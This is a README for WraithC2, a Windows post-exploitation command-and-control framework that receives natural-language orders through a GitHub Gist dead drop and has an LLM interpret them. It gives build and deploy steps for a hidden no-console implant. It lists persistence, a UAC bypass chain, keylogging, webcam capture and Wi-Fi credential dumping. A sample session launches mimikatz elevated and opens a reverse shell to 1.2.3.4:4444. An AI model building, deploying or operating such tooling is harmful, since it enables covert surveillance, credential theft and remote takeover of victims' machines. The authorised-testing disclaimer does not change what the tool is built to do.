farooq9/wraithc2
GitHub: farooq9/wraithc2
一款基于GitHub Gist死信箱通信的AI驱动Windows后渗透框架,无需C2服务器和开放端口,支持自然语言指令控制系统。
Stars: 0 | Forks: 0
# WraithC2
WraithC2 允许您使用简单的英语控制 Windows 代理。
指令通过私有 GitHub Gist 传输,因此没有监听服务器,也没有暴露的 IP。
LLM(NVIDIA NIM、OpenRouter、Anthropic 或 Groq —— 由您选择)解释每一条指令,并
自动执行最佳操作。
## 架构
```
Operator Machine Target Machine
---------------- ---------------
control.py <---- GitHub Gist ----> wraith.exe
(CLI) dead-drop (agent)
OP> @PC01: list running processes
JSON command -> Gist
agent polls Gist every 5 s
AI interprets: "processes" action
runs tasklist, posts result -> Gist
result read back
RESULT: [chrome.exe, explorer.exe ...]
```
无需端口转发。无需 VPS。无需防火墙规则。只需要一个免费的 GitHub 账户。
## 功能
| 类别 | 详情 |
|-------------------|---------|
| **传输** | GitHub Gist 死信箱(仅 HTTPS,无监听端口) |
| **AI 解释器** | 自然语言 -> 操作,通过 NVIDIA NIM / OpenRouter / Anthropic / Groq |
| **隐蔽性** | 单个 EXE,无控制台窗口,所有子进程隐藏 |
| **持久化** | HKCU 注册表运行键 + 计划任务(HKCU 不需要管理员权限) |
| **UAC 绕过** | fodhelper -> eventvwr -> sdclt(自动序列,三种方法) |
| **键盘记录器** | 通过 pynput 开始/停止/定时捕获,自动上传结果 |
| **网络摄像头** | 通过 OpenCV 单摄或所有连接的摄像头 |
| **屏幕截图** | 单次捕获或连续流 |
| **执行代码** | 运行由 AI 生成的 PowerShell / Python / VBScript / Batch |
| **提权运行** | 通过 ShellExecuteEx runas 以管理员权限启动任何 .exe |
| **反向 Shell** | 原始 TCP,启动前自动测试连接 |
| **文件传输** | 代理->操作员通过 GitHub 仓库;操作员->代理通过 gofile.io |
| **剪贴板** | 读取当前剪贴板内容 |
| **Wi-Fi 凭据** | 转储所有保存的无线配置文件 |
| **叙述** | AI 用简明的英语总结每个结果 |
## 快速开始
### 1. 克隆并安装
```
git clone https://github.com/farooq9/wraithc2
cd wraithc2
python -m venv .venv
.venv\Scripts\activate # Windows
pip install -r requirements.txt
python .venv\Scripts\pywin32_postinstall.py -install # Windows only
```
### 2. 配置
```
python control.py
```
首次运行时(或在提示符下输入 `setup`),向导将要求提供:
- AI 提供商 + 模型
- API key
- GitHub Gist ID + 个人访问令牌
- (可选)用于文件投递的私有仓库
- (可选)用于大文件的 Apache 上传 URL
它会自动写入 `config.py`。
### 3. 编译代理
```
compile.bat # Windows — produces dist\wraith.exe
```
或手动操作:
```
pyinstaller --onefile --noconsole --name wraith --runtime-tmpdir . wraith.py
```
### 4. 部署与控制
将 `dist\wraith.exe` 复制到目标机器并运行。
回到您的机器上:
```
python control.py
OP> list
Agents (1):
DESKTOP-AB1234 last seen: 2026-03-10T06:41:00Z
OP> @DESKTOP-AB1234: take a screenshot
[sent] -> DESKTOP-AB1234 id=a1b2c3d4
[waiting for result...]
RESULT: [screenshot] https://catbox.moe/...jpg
OP> @DESKTOP-AB1234: run C:\Tools\mimikatz.exe with admin privileges and give me the PID
RESULT: [run_elevated] Launched with admin rights. PID: 4812 Status: running
OP> @DESKTOP-AB1234: capture keystrokes for 60 seconds
RESULT: [keylog_timed] Keylogger started, will auto-stop in 60s...
OP> @DESKTOP-AB1234: connect to 1.2.3.4 port 4444
RESULT: [reverse_shell] Connecting reverse shell to 1.2.3.4:4444...
```
### 控制 CLI 参考
| 命令 | 描述 |
|---------|-------------|
| `list` | 显示在线代理 |
| `@HOST: ` | 向一个代理发送任何自然语言任务 |
| `all: ` | 向每个在线代理广播任务 |
| `results` | 读取所有待处理结果 |
| `deliver @HOST /path` | 通过 gofile.io 上传文件 -> 代理下载它 |
| `clear @HOST` / `clear all` | 从 Gist 擦除结果 |
| `setup` | 重新运行配置向导 |
| `build` | 显示编译说明 |
| `help` | 完整命令参考 |
| `exit` | 退出 |
## 支持的 AI 提供商
| 提供商 | 免费层 | 获取 Key |
|----------|-----------|---------|
| NVIDIA NIM | 是 | https://build.nvidia.com |
| OpenRouter | 是(许多 :free 模型) | https://openrouter.ai/keys |
| Anthropic | 否(付费) | https://console.anthropic.com |
| Groq | 是 | https://console.groq.com |
随时在 CLI 中运行 `setup` 以切换提供商或模型。
## 文件结构
```
wraithc2/
wraith.py Agent / implant (compile -> wraith.exe)
control.py Operator CLI (run on your machine)
config.py Shared configuration (generated by setup wizard)
compile.bat One-click agent compiler (Windows)
requirements.txt Python dependencies
README.md This file
```
## requirements.txt 摘要
```
requests Gist transport + HTTP uploads
pynput Keylogger / keyboard hooks
Pillow Screenshots
pywin32 Windows API (registry, clipboard, DLL injection)
opencv-python Webcam capture
pycaw Volume control
pyinstaller Compile to EXE
```
完整列表:[requirements.txt](requirements.txt)
## 法律声明
本软件适用于:
- 您拥有或拥有明确书面测试授权的系统的授权渗透测试
- 受控环境中的学术/教育研究
- 具有适当参与授权的红队演练
**针对您不拥有的系统的未经授权使用是非法的**,根据《计算机欺诈和滥用法》(美国)、
《计算机滥用法》(英国)以及全球同等法律。
作者对滥用行为不承担任何责任。
标签:AI 驱动攻击, CSV导出, Dead-drop 通信, GitHub Gist 隐蔽通道, IP 地址批量处理, OpenCanary, PE 加载器, Powershell 执行, UAC 绕过, Windows 远控, 协议分析, 反向 Shell, 后渗透框架, 命令与控制 (C2), 大语言模型 (LLM), 屏幕截图, 持久化控制, 摄像头劫持, 无端口监听, 权限提升, 漏洞挖掘, 网络安全, 逆向工具, 键盘记录, 隐私保护, 隐蔽通信